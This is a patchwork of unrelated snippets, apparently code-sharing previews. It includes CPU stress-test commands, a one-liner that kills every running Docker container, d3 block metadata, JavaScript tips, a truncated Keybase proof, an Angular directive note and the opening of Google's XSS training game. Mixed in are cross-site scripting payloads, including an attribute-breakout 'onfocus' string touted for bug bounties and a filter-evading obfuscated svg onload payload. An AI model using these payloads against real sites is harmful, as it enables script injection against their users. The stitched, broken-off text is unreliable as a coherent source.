sudo amazon-linux-extras install epel -y
sudo yum install stress -y
#Stress the CPU with four worker threads for 320 seconds
sudo stress --cpu 4 --timeout 320
" onfocus="alert(1)" name="bounty | |
(Append #bounty to the URL and enjoy your zero interaction XSS ) | |
<svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;// | |
# Internet Explorer, Edge | |
<svg><script>alert(1)<p> | |
# Firefox |
docker ps | awk {' print $1 '} | tail -n+2 > tmp.txt; for line in $(cat tmp.txt); do docker kill $line; done; rm tmp.txt |
license: gpl-3.0 | |
height: 960 | |
border: no | |
redirect: https://observablehq.com/@d3/hierarchical-edge-bundling |
// By @coderitual | |
// https://twitter.com/coderitual/status/1112297299307384833 | |
// Remove any duplicates from an array of primitives. | |
const unique = [...new Set(arr)] | |
// Sleep in async functions. Use: await sleep(2000). | |
const sleep = (ms) => (new Promise(resolve => setTimeout(resolve, ms))); | |
// Type this in your code to break chrome debugger in that line. |
### Keybase proof | |
I hereby claim: | |
* I am kedomonzter on github. | |
* I am kedomonzter (https://keybase.io/kedomonzter) on keybase. | |
* I have a public key ASBU5gihlbCeVYSbZdWxNTxwGZk1QB-UXSwKciNpLWTb5Ao | |
To claim this, I am signing this object: |
=====================================================================
When using directives, you often need to pass parameters to the directive. This can be done in several ways. The first 3 can be used whether scope is true or false. This is still a WIP, so validate for yourself.
-
Raw Attribute Strings
<div my-directive="some string" another-param="another string"></div>
Welcome, recruit! Cross-site scripting (XSS) bugs are one of the most common and dangerous types of vulnerabilities in Web applications. These nasty buggers can allow your enemies to steal or modify user data in your apps and you must learn to dispatch them, pronto!
At Google, we know very well how important these bugs are. In fact, Google is so serious about finding and fixing XSS issues that we are paying mercenaries up to $7,500 for dangerous XSS bugs discovered in our most sensitive products.
In this training program, you will learn to find and exploit XSS bugs. You'll use this knowledge to confuse and infuriate your adversaries by preventing such bugs from happening in your applications.
There will be cake at the end of the test.